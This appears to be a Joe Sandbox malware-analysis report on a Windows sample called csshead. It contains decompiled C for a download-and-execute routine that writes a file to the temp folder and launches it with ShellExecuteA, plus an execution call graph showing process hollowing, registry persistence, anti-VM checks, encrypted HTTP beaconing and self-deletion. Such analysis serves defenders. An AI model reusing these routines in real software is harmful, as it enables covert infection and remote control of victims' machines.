    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SelectObject.GDI32(?,00000000), ref: 0041E504
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00407D3C(void* __eax, void* __ecx, void* __edx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				char _v85;
    				char _v342;
    				void* _t34;
    				intOrPtr _t42;
    				void* _t55;
    				intOrPtr _t58;
    
    				_t55 = __ecx;
    				_v8 = __eax;
    				_v342 = 0;
    				GetTempPathA(0x101,  &_v342);
    				_v12 = _v8;
    				_v16 = 0;
    				while(1) {
    					_t34 = _v12;
    					if( *_t34 == 0) {
    						break;
    					}
    					__eflags =  *_v12 - 0x2f;
    					if( *_v12 == 0x2f) {
    						_v16 = _v12;
    					}
    					_t10 =  &_v12;
    					 *_t10 = _v12 + 1;
    					__eflags =  *_t10;
    				}
    				if(_v16 != 0) {
    					_v16 = _v16 + 1;
    					E0040133C( &_v342, _v16);
    					if(E00403C28(_v8, _t55,  &_v342) == 0) {
    						_t42 =  *0x40a170; // 0x401e04
    						return E00407240(_t42, __eflags);
    					}
    					_t34 = ShellExecuteA(0, 0,  &_v342, 0, 0, 5);
    					_v20 = _t34;
    					_t66 = _v20 - 0x20;
    					if(_v20 <= 0x20) {
    						E00401864(_v20,  &_v85);
    						_t58 =  *0x40a16c; // 0x401df8
    						E00401308( &_v342, _t58);
    						E0040133C( &_v342,  &_v85);
    						return E00407240( &_v342, _t66);
    					}
    				}
    				return _t34;
    			}
    APIs
    • GetTempPathA.KERNEL32(00000101,00000000), ref: 00407D5B
      • Part of subcall function 00403C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
      • Part of subcall function 00403C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
      • Part of subcall function 00403C28: CloseHandle.KERNEL32(000000FF), ref: 00403E6B
    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 00407DCA
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • _UnwindNestedFrames.LIBCMT ref: 0042A902
      • Part of subcall function 00423F05: RtlUnwind.KERNEL32(00423F30,0?B,?,00000000), ref: 00423F2B
      • Part of subcall function 0042A2CD: __getptd.LIBCMT ref: 0042A2F4
      • Part of subcall function 0042A2CD: __CallSettingFrame@12.LIBVCRUNTIME ref: 0042A340
      • Part of subcall function 0042A52B: __CreateFrameInfo.LIBCMT ref: 0042A553
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A55D
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A56B
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A579
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A584
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 004259D7
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 004259E4
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 004259F1
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 004259FE
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 00425A0B
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 00425A27
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(00000000), ref: 00425A37
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 00425A4D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • lstrcpy.KERNEL32(?,?), ref: 0041E1A6
    • InterlockedDecrement.KERNEL32(?), ref: 0041E1CA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424204
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424214
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424225
    • __getptd.LIBCMT ref: 0042A660
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A66E
      • Part of subcall function 004241D7: __getptd.LIBCMT ref: 004241DC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00414E70: CallWindowProcA.USER32(?,?,?,?,?), ref: 00414E8C
      • Part of subcall function 00414E70: DeleteObject.GDI32(?), ref: 00414EE6
      • Part of subcall function 00414E70: RtlEnterCriticalSection.NTDLL(00442B64), ref: 00414F07
      • Part of subcall function 00414E70: GetCurrentThreadId.KERNEL32 ref: 00414F1A
      • Part of subcall function 00414E70: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00414F51
      • Part of subcall function 00414E70: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414F6A
      • Part of subcall function 00414E70: UnhookWindowsHookEx.USER32(00000000), ref: 00414F93
      • Part of subcall function 00414E70: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041500D
    • GetProcAddress.KERNEL32(?,CloseThemeData), ref: 0041652A
    • FreeLibrary.KERNEL32(?), ref: 0041654E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(?), ref: 0042B13D
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Execution Graph

    Execution Coverage:35.2%
    Dynamic/Decrypted Code Coverage:99.9%
    Signature Coverage:8.6%
    Total number of Nodes:1808
    Total number of Limit Nodes:21

Graph

execution_graph

Each entry below is an entry point of the call graph (a function with no caller in the graph) followed by the functions and Windows API calls reached from it, in call order; "N API calls" is the graph's own marker for a callee it collapses into a count.

• 7c6db0: 7c6dbe -> 7c6dc8 GetTickCount -> 7c6dd1 -> 7c6dd3 Sleep GetTickCount
• 7c1aae: 7c1ab0 -> 7c1ac9 CryptEncrypt -> 7c1aee
• 7c4b9b: 7c4ba0 GetComputerNameA -> 7c4beb RegOpenKeyExA -> 7c38b0 RegQueryValueExA (called again from 7c4c2c, 7c4c76 and 7c4cc0) -> 7c4d0c -> 7c3890 RegCloseKey -> 7c4d17 GetVolumeInformationA -> 7c4d60
• 7c7278: 7c7240 (36 API calls) -> 7c7283 RtlExitUserThread
• 7c80be: 7c80c0 -> 7c80d5 RtlRemoveVectoredExceptionHandler -> 7c80e1 CreateEventA WaitForSingleObject CloseHandle -> 7c8128 -> 7c471c (17 API calls, twice) -> 7c816f -> 7c8178 SendMessageA -> 7c818a -> 7c81f0 or 7c81b0 SHDeleteKeyA, else 7c8064 (3 API calls) -> 7c4a1c (3 API calls) -> 7c81d1 -> 7c1828 VirtualFree -> 7c821b ReleaseMutex CloseHandle -> 7c8242 ExitProcess or 7c824a
• 7c9230: 7c9232 -> 7c9254 Sleep -> 7c9268 -> 7c6e04 GetModuleFileNameA CharUpperBuffA (three rounds of 7c3f38 (2 API calls) and 7c1440 GetProcessHeap HeapFree) -> 7c6ec7 -> 7c9285 OpenMutexA -> 7c92a1 CloseHandle ExitProcess, or 7c92b3 -> 7c69bc (12 API calls) -> 7c92bb
• 7c3f36: 7c3f38 -> 7c13dc GetProcessHeap RtlAllocateHeap -> 7c3f6c
• 7c4133: 7c4154 GetKeyboardLayoutList -> 7c4178
• 7c9080: 7c9091 -> 7c2574: 7c24f8 GetPEB, then 7c1994 (7c1928 -> 7c1961 LoadLibraryA GetProcAddress) from every site between 7c25a4 and 7c37dd, with direct LoadLibraryA calls at 7c2d4e, 7c2d93, 7c2fd0, 7c2ff0, 7c3011, 7c309e, 7c337d, 7c33c2, 7c3407, 7c344c, 7c347f, 7c34c4, 7c3506 and 7c3678; 7c37ef then enters 7c8d0c:
  - 7c8d1c -> 7c2574 (17 API calls) -> 7c8d29 -> 7c44f0 (7c1258 -> 7c4509 GetVersionExA) -> 7c8d2e GetCurrentProcess -> 7c42d4 OpenProcessToken (7c4300 GetTokenInformation, 7c4322 GetLastError, 7c13dc GetProcessHeap RtlAllocateHeap, 7c4346 GetTokenInformation, 7c4368 GetSidSubAuthorityCount, 7c4385 GetSidSubAuthority, 7c1440 GetProcessHeap HeapFree, 7c43ef CloseHandle) -> 7c43f9 -> 7c44f0 GetVersionExA -> 7c8d48
  - 7c8d48 -> 7c8d5d GetCurrentProcess -> 7c42d4 (11 API calls), or 7c8d4d -> 7c41cc GetCurrentThread OpenThreadToken (7c41f4 GetLastError, 7c4201 GetCurrentProcess OpenProcessToken, 7c422b GetTokenInformation CloseHandle, 7c425a AllocateAndInitializeSid, 7c4293 EqualSid, 7c42ba FreeSid, 7c1440 GetProcessHeap HeapFree) -> 7c42cc; both reach 7c8d52 GetCurrentProcess -> 7c453c (7c4555 GetCurrentProcess, 7c4567 IsWow64Process) -> 7c79bc -> 7c7a0f RtlInitializeCriticalSection -> 7c1258 -> 7c7a29 RtlInitializeCriticalSection -> 7c8d90 LocalAlloc
  - 7c8d90 LocalAlloc -> 7c4408 InitializeSecurityDescriptor -> 7c442d SetSecurityDescriptorDacl -> 7c4445 ConvertStringSecurityDescriptorToSecurityDescriptorA -> 7c4463 GetSecurityDescriptorSacl -> 7c4488 SetSecurityDescriptorSacl -> 7c44a8 LocalFree -> 7c44bb CreateMutexA LocalFree -> 7c8df3
  - 7c8df3 -> 7c8bfc RegOpenKeyExA -> 7c38b0 RegQueryValueExA (twice) -> 7c3890 RegCloseKey -> 7c8ca2 -> 7c8df8 -> 7c7984 GetVolumeInformationA -> 7c8dfd -> 7c89d4 GetVolumeInformationA -> 7c8e02
  - 7c8e02 -> 7c7a44 GetModuleFileNameA -> 7c48dc -> 7c7a7d GetFileVersionInfoSizeA -> 7c13dc GetProcessHeap RtlAllocateHeap -> 7c7aa3 GetFileVersionInfoA -> 7c1864 wsprintfA (from 7c7ac7, 7c7b18, 7c7b55 and 7c7b99) -> 7c7bd6 -> 7c1440 GetProcessHeap HeapFree -> 7c7bf5 RtlInitializeCriticalSection -> 7c47ac CreateFileA (7c47e8 CreateFileA, 7c480a GetFileSize, 7c13b4 VirtualAlloc, 7c482b ReadFile CloseHandle) -> 7c4855 -> 7c7304
  - 7c7304: 7c733c or 7c731b RegOpenKeyExA -> 7c735b -> 7c38b0 RegQueryValueExA -> 7c737f -> 7c13dc GetProcessHeap RtlAllocateHeap (twice) -> 7c73ad -> 7c38b0 RegQueryValueExA -> 7c73c7 -> 7c59bc (6 API calls) -> 7c73e2 -> 7c72c4 -> 7c6eec (7c3f38: 7c13dc GetProcessHeap RtlAllocateHeap, 7c3f6c LoadLibraryA, 7c1440 GetProcessHeap HeapFree; 7c1994 four times; 7c6f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA -> 7c12dc -> 7c12f0 CharLowerBuffA SetupDiDestroyDeviceInfoList; 7c3f38 again; 7c701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA -> 7c12dc -> 7c708e CharLowerBuffA SetupDiDestroyDeviceInfoList -> 7c70b4 -> 7c1440 GetProcessHeap HeapFree -> 7c70c7) -> 7c73f3 -> 7c1440 GetProcessHeap HeapFree -> 7c7435 -> 7c1440 GetProcessHeap HeapFree -> 7c743d -> 7c3890 RegCloseKey -> 7c7445 -> 7c8e48, directly or via 7c744c -> 7c7469 -> 7c72c4 (17 API calls) -> 7c7471
  - 7c8e48 -> 7c471c (17 API calls) -> 7c8e63 -> 7c8e69 -> 7c471c (17 API calls) -> 7c8ead -> 7c8eb6 or 7c8ec8 -> 7c4a1c (7c395c RegOpenKeyA -> 7c4a4a RegDeleteValueA -> 7c3890 RegCloseKey) -> 7c8ed8 -> either 7c8f0c -> 7c8b6c CreateThread CloseHandle (thread body 7c8aa4, 6 API calls) -> 7c8f1e, or 7c8f23 -> 7c744c (17 API calls) -> 7c8f2d -> 7c8b98 (7c8ba8 or 7c8bcc SHGetSpecialFolderPathA -> 7c8bc7 -> 7c7560 -> 7c3b80 (2 API calls) -> 7c1440 GetProcessHeap HeapFree -> 7c75c3) -> 7c8bf5 -> 7c8b6c CreateThread CloseHandle -> 7c8f3c; the created thread runs 7c8aa4 -> 7c8ad4 RegisterClassExA CreateWindowExA -> 7c8b47 GetMessageA -> 7c8b33 TranslateMessage DispatchMessageA (back to GetMessageA) -> 7c8b5b RtlExitUserThread
  - 7c8f3c -> 7c4ba0 GetComputerNameA (the same registry and volume sequence as 7c4b9b above) -> 7c4d60 -> 7c8f46 -> 7c5468 GetSystemTime (twice) -> 7c8f55 -> 7c3b80 (2 API calls) -> 7c8f65 -> 7c1440 GetProcessHeap HeapFree -> 7c8f7d -> 7c8f86 or 7c8f9a -> 7c8064 RegOpenKeyExA -> 7c8095 RegDeleteValueA -> 7c3890 RegCloseKey -> 7c80b7 -> 7c8f98 -> 7c8fc3 Sleep (self-loop) -> 7c8fd7 -> 7c8ffc GetCursorPos -> 7c9006 -> 7c471c -> 7c9015 -> 7c7474 -> 7c8f1e -> 7c38dc RtlEnterCriticalSection -> 7c9029 -> 7c38ec RtlLeaveCriticalSection -> 7c903b -> 7c5640 -> 7c9046 -> 7c84a4
  - 7c471c: 7c4733 -> 7c13dc GetProcessHeap RtlAllocateHeap -> 7c4742 -> 7c4764 CreateThread SetThreadPriority CloseHandle -> 7c47a1, or 7c4798 -> 7c4608 (7c3988 FindFirstFileA FindClose, 7c4645 CreateFileA, 7c466a GetFileSize, 7c468e WriteFile, 7c46b2 FlushFileBuffers CloseHandle, 7c46c6 DeleteFileA, 7c46e5 or 7c46f6 Sleep, 7c1440 GetProcessHeap HeapFree) -> 7c4712 -> 7c47a1
  - 7c7474: 7c7493 -> 7c72c4 (17 API calls) -> 7c749e -> 7c5894 (6 API calls) -> 7c74be -> 7c13dc GetProcessHeap RtlAllocateHeap -> 7c74c6 -> 7c5894 (6 API calls) -> 7c74e6 -> 7c74ef or 7c7515 RegCreateKeyExA -> 7c7539 -> 7c3930 RegSetValueExA -> 7c7550 -> 7c3890 RegCloseKey -> 7c755b
  - 7c5640 SHGetSpecialFolderPathA -> 7c133c -> 7c1345 -> 7c567c FindFirstFileA -> 7c56ab (7c3988 FindFirstFileA FindClose, 7c47ac (6 API calls), 7c5759 -> 7c1828 VirtualFree -> 7c5810, 7c581a FindNextFileA, 7c1828 VirtualFree) -> 7c5839 FindClose -> 7c9046
  - 7c84a4 -> 7c13dc GetProcessHeap RtlAllocateHeap -> 7c84c1 -> 7c8514 Sleep, 7c5ae8, or 7c8521; from 7c8521: 7c64bc (7 API calls), 7c1864 wsprintfA, 7c86e3 GetTickCount -> 7c86fd Sleep, 7c5d20 (29 API calls), 7c5468 GetSystemTime, 7c7474 (27 API calls), 7c8258 WSAStartup gethostname gethostbyname (-> 7c829b -> 7c82ab inet_ntoa, 7c82e9 WSACleanup -> 7c82ef), 7c4154 GetKeyboardLayoutList, 7c660c, 7c87d6
  - 7c5ae8 -> 7c5b06: 7c3864 InternetOpenA, 7c161c InternetConnectA, 7c1660 HttpOpenRequestA, 7c170c InternetSetOptionA, 7c15e4 HttpSendRequestA, 7c39cc HttpQueryInfoA, 7c151c InternetCloseHandle -> 7c5d12
  - 7c660c -> 7c64bc (7 API calls) -> 7c6630: 7c66fd GetTickCount, 7c66f0 Sleep, 7c5d20 (29 API calls), 7c67af GetTickCount -> 7c67c4 Sleep, 7c5468 GetSystemTime, 7c67ee Sleep -> 7c5620 -> 7c14f8 InternetGetConnectedState -> 7c5635, 7c5ae8 (7 API calls), 7c680a Sleep; 7c66de and 7c678d -> 7c1440 GetProcessHeap HeapFree -> 7c66e6
  - 7c87d6: 7c8957 Sleep (self-loop), 7c80c0 (33 API calls), 7c82f8, 7c7f20, 7c1440 GetProcessHeap HeapFree; 7c8877 and 7c88b4 RtlExitUserThread
  - 7c82f8 -> 7c8317 -> 7c8481 -> 7c7290 CreateThread CloseHandle -> 7c8416, or 7c833e -> 7c8358 GetTempPathA -> 7c7560 (4 API calls) -> 7c8375 -> 7c83cd -> 7c485c (4 API calls) -> 7c83de Sleep CreateProcessA -> 7c841f -> 7c7290 CreateThread CloseHandle -> 7c8416, or 7c842b -> 7c1828 VirtualFree -> 7c843c -> 7c13b4 VirtualAlloc -> 7c8449 -> 7c8459 wsprintfA -> 7c8416
  - 7c7f20 -> 7c7f3a -> 7c7e28 (returns to 7c7f3a; exits at 7c804e): 7c7e49 -> 7c7e68, 7c7e5a or 7c7eed; 7c7e6d -> 7c7e7f lstrcmpi -> 7c7eac -> 7c7240 (36 API calls) or 7c7e93 -> 7c7474 (27 API calls); 7c7e5a -> 7c7e61 -> 7c7474 (27 API calls), or 7c7eb8 -> 7c7d3c GetTempPathA -> 7c7d6e -> 7c3c28 -> 7c3e90 -> 7c7e1a -> 7c7240 (36 API calls), or 7c7db9 ShellExecuteA -> 7c7dd9 -> 7c1864 wsprintfA -> 7c7de6 -> 7c7240 (36 API calls) -> 7c7e18; 7c7eed -> 7c7474 (27 API calls)
  - 7c3c28 -> 7c3c45 -> 7c3a04 (7c395c RegOpenKeyA -> 7c38b0 RegQueryValueExA -> 7c3890 RegCloseKey, twice; then 7c395c RegOpenKeyA -> 7c3ade -> 7c38fc RegEnumValueA (repeated) -> 7c3b49 -> 7c3890 RegCloseKey -> 7c3b63) -> 7c3c4a -> 7c3864 InternetOpenA -> 7c3d01 -> 7c161c InternetConnectA -> 7c3d36 -> 7c1660 HttpOpenRequestA -> 7c3d6f -> 7c16d8 InternetQueryOptionA -> 7c3d93 -> 7c170c InternetSetOptionA -> 7c3dac -> 7c15e4 HttpSendRequestA -> 7c3dbc -> 7c39cc HttpQueryInfoA -> 7c3de5 -> 7c3df2 CreateFileA -> 7c3e17 (7c16a4 InternetQueryDataAvailable, 7c15b0 InternetReadFile -> 7c3e40 WriteFile, repeated) -> 7c3e67 CloseHandle -> 7c3e78 -> 7c151c InternetCloseHandle (three times, via 7c3e80 and 7c3e88) -> 7c3e90
• 7c3b6b GetCommandLineA
• 7c71d2: 7c71d4 -> 7c64bc (7 API calls) -> 7c71fc -> 7c5d20 (29 API calls) -> 7c7231
• 7c7f1c: 7c7f20 -> 7c7e28 (60 API calls, repeated) -> 7c804e
• 7c91ac: 7c91ae -> 7c69bc -> 7c6904 GetComputerNameA -> 7c694f RegOpenKeyExA -> 7c38b0 RegQueryValueExA -> 7c6992 -> 7c3890 RegCloseKey -> 7c699d -> 7c69d5 GetTempPathA -> 7c69fa -> 7c47ac (6 API calls) -> 7c6a0b -> 7c1828 VirtualFree -> 7c6a2f
• 7c6bf0: 7c6b60 -> 7c6b78 -> 7c6b8b Sleep (repeated) -> 7c6b9f -> 7c6bfe
• 7c3c26: 7c3c28 (the same 7c3a04 registry walk and WinINet download sequence listed above) -> 7c3e90
• 7c5026: 7c5028 -> 7c503e GetModuleHandleA -> 7c5049 -> 7c506e CreateProcessA -> 7c50a3 -> 7c50c4 CreateFileMappingA MapViewOfFile -> 7c5124 -> 7c13b4 VirtualAlloc -> 7c5169 -> 7c4ef0 (7c13dc GetProcessHeap RtlAllocateHeap, 7c4e94 NtQueryInformationProcess -> 7c4ec2 ReadProcessMemory, then 7c4f25, 7c4f4e, 7c4fa5 and 7c4fd8 ReadProcessMemory -> 7c4ffd -> 7c1440 GetProcessHeap HeapFree) -> 7c5019 -> 7c51db -> 7c51f4 GetThreadContext -> 7c5213 -> 7c4de0 (7c1258 -> 7c4dfb NtQueryInformationProcess -> 7c4e18 -> 7c4e1e ReadProcessMemory ReadProcessMemory ReadProcessMemory -> 7c4e8d) -> 7c5233 -> 7c5240 VirtualProtectEx WriteProcessMemory -> 7c1828 VirtualFree -> 7c527a ResumeThread -> 7c528a WaitForSingleObject -> 7c529c GetExitCodeProcess -> 7c52ba CloseHandle CloseHandle -> 7c52ce
• 7c5466: 7c5468 GetSystemTime -> 7c5480
• 7c70e5: 7c7118 -> 7c3f38 (2 API calls) -> 7c7130 RegOpenKeyExA -> 7c1440 GetProcessHeap HeapFree -> 7c7155 -> 7c3f38 (2 API calls) -> 7c7166 -> 7c38b0 RegQueryValueExA -> 7c7185 -> 7c3f38 (2 API calls) -> 7c7196 -> 7c1440 GetProcessHeap HeapFree -> 7c71bb -> 7c1440 GetProcessHeap HeapFree -> 7c71c3 -> 7c3890 RegCloseKey -> 7c71cb
• 7c9468: 7c9479 CreateThread RtlExitUserThread -> 7c9124; 7c90b8 -> 7c252c -> 7c24f8 GetPEB -> 7c2535 -> 7c1994; 7c90fb -> 7c2574 (17 API calls) -> 7c911e -> 7c9479
API calls 5481->5482 5483 7c2545 5482->5483 5484 7c1994 2 API calls 5483->5484 5485 7c2557 5484->5485 5486 7c1994 2 API calls 5485->5486 5487 7c2569 VirtualProtect 5486->5487 5487->5476 5489 7c69bc 12 API calls 5488->5489 5490 7c9135 5489->5490 5491 7c3e98 5492 7c3ed5 RegCreateKeyExA 5491->5492 5493 7c3eaf RegCreateKeyExA 5491->5493 5494 7c3ef9 5492->5494 5493->5494 5499 7c38b0 RegQueryValueExA 5494->5499 5496 7c3f16 5500 7c3890 RegCloseKey 5496->5500 5498 7c3f2f 5499->5496 5500->5498 5501 7c7c4e 5502 7c7c50 CreateFileA 5501->5502 5503 7c7c80 CreateFileA 5502->5503 5504 7c7c9c 5502->5504 5503->5504 5505 7c7ca2 ReadFile SetFilePointer ReadFile CloseHandle 5504->5505 5506 7c7cf3 5504->5506 5505->5506 5248 7c17a2 5249 7c17a4 5248->5249 5250 7c17de 5249->5250 5251 7c17bd CryptDecrypt 5249->5251 5251->5250 3596 7c8a48 3597 7c8a5d PostQuitMessage 3596->3597 3598 7c8a56 3596->3598 3601 7c8a79 3597->3601 3599 7c8a6c 3598->3599 3600 7c8a5b NtdllDefWindowProc_A 3598->3600 3604 7c78fc 3599->3604 3600->3601 3615 7c38dc RtlEnterCriticalSection 3604->3615 3606 7c7944 3644 7c38ec RtlLeaveCriticalSection 3606->3644 3607 7c790f 3607->3606 3609 7c7946 3607->3609 3610 7c793c 3607->3610 3612 7c7962 SHDeleteKeyA 3609->3612 3613 7c794f SHDeleteKeyA 3609->3613 3616 7c76a0 3610->3616 3611 7c797d 3611->3601 3612->3606 3613->3606 3615->3607 3617 7c77ba 3616->3617 3618 7c76b9 3616->3618 3617->3606 3618->3617 3645 7c3fc8 CoInitialize 3618->3645 3620 7c7893 3622 7c4968 4 API calls 3620->3622 3621 7c7776 3651 7c4968 3621->3651 3627 7c78a3 3622->3627 3624 7c7786 3624->3617 3626 7c779a 3624->3626 3634 7c77bf 3624->3634 3625 7c7712 3625->3620 3625->3621 3660 7c485c CreateFileA 3626->3660 3627->3617 3630 7c485c 4 API calls 3627->3630 3631 7c78d5 3630->3631 3633 7c763c 39 API calls 3631->3633 3633->3617 3673 7c3b80 3634->3673 3636 7c781d 3676 7c1440 GetProcessHeap HeapFree 3636->3676 3638 7c7838 3639 7c7846 MoveFileExA 3638->3639 3639->3617 3640 7c7866 3639->3640 3640->3617 3641 7c485c 4 API calls 
3640->3641 3642 7c7886 3641->3642 3643 7c763c 39 API calls 3642->3643 3643->3617 3644->3611 3646 7c400f 3645->3646 3647 7c4072 MultiByteToWideChar MultiByteToWideChar 3646->3647 3648 7c40dd 3646->3648 3649 7c40c9 3647->3649 3648->3625 3677 7c3988 FindFirstFileA FindClose 3649->3677 3652 7c498a SHGetValueA 3651->3652 3678 7c48dc 3651->3678 3654 7c49bb RegOpenKeyExA 3652->3654 3655 7c4a12 3652->3655 3654->3655 3656 7c49da 3654->3656 3655->3624 3680 7c3930 RegSetValueExA 3656->3680 3658 7c49fb 3681 7c3890 RegCloseKey 3658->3681 3661 7c48d4 3660->3661 3662 7c4895 WriteFile 3660->3662 3665 7c763c CreateFileA 3661->3665 3663 7c48b1 3662->3663 3664 7c48c0 FlushFileBuffers CloseHandle 3662->3664 3663->3664 3664->3661 3666 7c7692 3665->3666 3667 7c7667 GetFileSize 3665->3667 3670 7c7240 36 API calls 3666->3670 3668 7c7686 CloseHandle 3667->3668 3669 7c767c 3667->3669 3672 7c769c 3668->3672 3682 7c7240 3669->3682 3670->3672 3672->3617 3938 7c13dc GetProcessHeap RtlAllocateHeap 3673->3938 3675 7c3b99 3675->3636 3676->3638 3677->3648 3679 7c48f9 3678->3679 3679->3652 3680->3658 3681->3655 3683 7c7259 3682->3683 3688 7c71d4 3683->3688 3686 7c7271 3686->3668 3689 7c71f1 3688->3689 3693 7c7231 3688->3693 3695 7c64bc 3689->3695 3691 7c71fc 3708 7c5d20 3691->3708 3693->3686 3694 7c1440 GetProcessHeap HeapFree 3693->3694 3694->3686 3696 7c64d8 3695->3696 3697 7c651f GetVersionExA 3696->3697 3811 7c1864 wsprintfA 3697->3811 3699 7c6549 3812 7c1864 wsprintfA 3699->3812 3701 7c6572 3813 7c1864 wsprintfA 3701->3813 3703 7c6593 3814 7c3ea0 3703->3814 3707 7c65f2 3707->3691 3709 7c6332 3708->3709 3710 7c5d38 3708->3710 3709->3693 3710->3709 3826 7c54b8 3710->3826 3715 7c5858 3 API calls 3716 7c5dfe 3715->3716 3839 7c17e8 3716->3839 3726 7c5eaf 3854 7c3864 InternetOpenA 3726->3854 3728 7c5ed6 3855 7c170c InternetSetOptionA 3728->3855 3730 7c5ef2 3856 7c170c InternetSetOptionA 3730->3856 3732 7c5f0b 3857 7c170c InternetSetOptionA 3732->3857 3734 7c5f24 3858 7c170c InternetSetOptionA 
3734->3858 3736 7c5f36 3859 7c170c InternetSetOptionA 3736->3859 3738 7c5f4f 3739 7c5f76 3738->3739 3860 7c170c InternetSetOptionA 3738->3860 3861 7c161c InternetConnectA 3739->3861 3742 7c5fa8 3862 7c1660 HttpOpenRequestA 3742->3862 3744 7c6050 3746 7c6056 3744->3746 3747 7c60b0 3744->3747 3745 7c6013 3745->3744 3863 7c16d8 InternetQueryOptionA 3745->3863 3865 7c5894 3746->3865 3884 7c13dc GetProcessHeap RtlAllocateHeap 3747->3884 3750 7c6037 3864 7c170c InternetSetOptionA 3750->3864 3755 7c607a 3759 7c5894 6 API calls 3755->3759 3756 7c60ae 3885 7c15e4 HttpSendRequestA 3756->3885 3758 7c60f6 3760 7c60fa 3758->3760 3761 7c6107 3758->3761 3759->3756 3886 7c1440 GetProcessHeap HeapFree 3760->3886 3887 7c1440 GetProcessHeap HeapFree 3761->3887 3764 7c610f 3888 7c39cc HttpQueryInfoA 3764->3888 3767 7c6138 3808 7c6102 3767->3808 3889 7c13dc GetProcessHeap RtlAllocateHeap 3767->3889 3768 7c6322 3925 7c151c InternetCloseHandle 3768->3925 3771 7c632a 3926 7c151c InternetCloseHandle 3771->3926 3774 7c61c5 3777 7c61d8 3774->3777 3778 7c61cb 3774->3778 3775 7c614f 3775->3774 3776 7c6197 3775->3776 3775->3808 3890 7c16a4 InternetQueryDataAvailable 3775->3890 3776->3775 3891 7c1460 GetProcessHeap RtlReAllocateHeap 3776->3891 3892 7c15b0 InternetReadFile 3776->3892 3894 7c13dc GetProcessHeap RtlAllocateHeap 3777->3894 3893 7c1440 GetProcessHeap HeapFree 3778->3893 3782 7c61e1 3895 7c59bc 3782->3895 3786 7c17e8 CryptAcquireContextA 3787 7c6222 3786->3787 3909 7c1374 3787->3909 3792 7c1404 CryptHashData 3793 7c6261 3792->3793 3794 7c1404 CryptHashData 3793->3794 3795 7c627e 3794->3795 